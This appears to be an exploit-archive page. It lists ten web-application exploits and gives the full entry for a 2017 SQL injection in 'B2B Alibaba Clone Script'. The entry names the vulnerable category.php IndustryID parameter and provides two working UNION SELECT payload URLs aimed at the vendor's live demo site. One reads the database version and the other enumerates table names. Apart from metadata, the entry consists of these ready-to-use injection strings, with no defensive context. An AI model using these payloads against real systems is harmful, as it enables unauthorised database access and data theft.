
10 new exploits Complain Management System - SQL injection ICGames-Games Site Script 1.2 - Authentication Bypass Domains Marketplace Script 1.1 - Authentication Bypass ICTutors Tutoring Site Script 1.1 - Authentication Bypass Mini Blog 1.1 - Authentication Bypass Job Site PHP Script 1.1 - Authentication Bypass Music Site Script 1.2 - Authentication Bypass Affiliate Tracking Script 1.1 - Authentication Bypass Mini CMS 1.1 - Authentication Bypass B2B Alibaba Clone Script - SQL Injection
25 lines
872 B
Text
Executable file
25 lines
872 B
Text
Executable file
# # # # #
|
|
# Exploit Title: B2B Alibaba Clone Script - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 20.01.2017
|
|
# Vendor Homepage: https://www.clonescriptsoft.com/
|
|
# Software Buy: https://www.clonescriptsoft.com/collections/b2b-alibaba-clone/products/alibaba-clone
|
|
# Demo: http://alibaba.clonescriptsoft.com/
|
|
# Version: N/A
|
|
# Tested on: Win7 x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/category.php?IndustryID=[SQL]
|
|
# E.t.c....
|
|
# # # # #
|
|
|
|
|
|
SQL Injection
|
|
http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,version()
|
|
|
|
http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--
|
|
|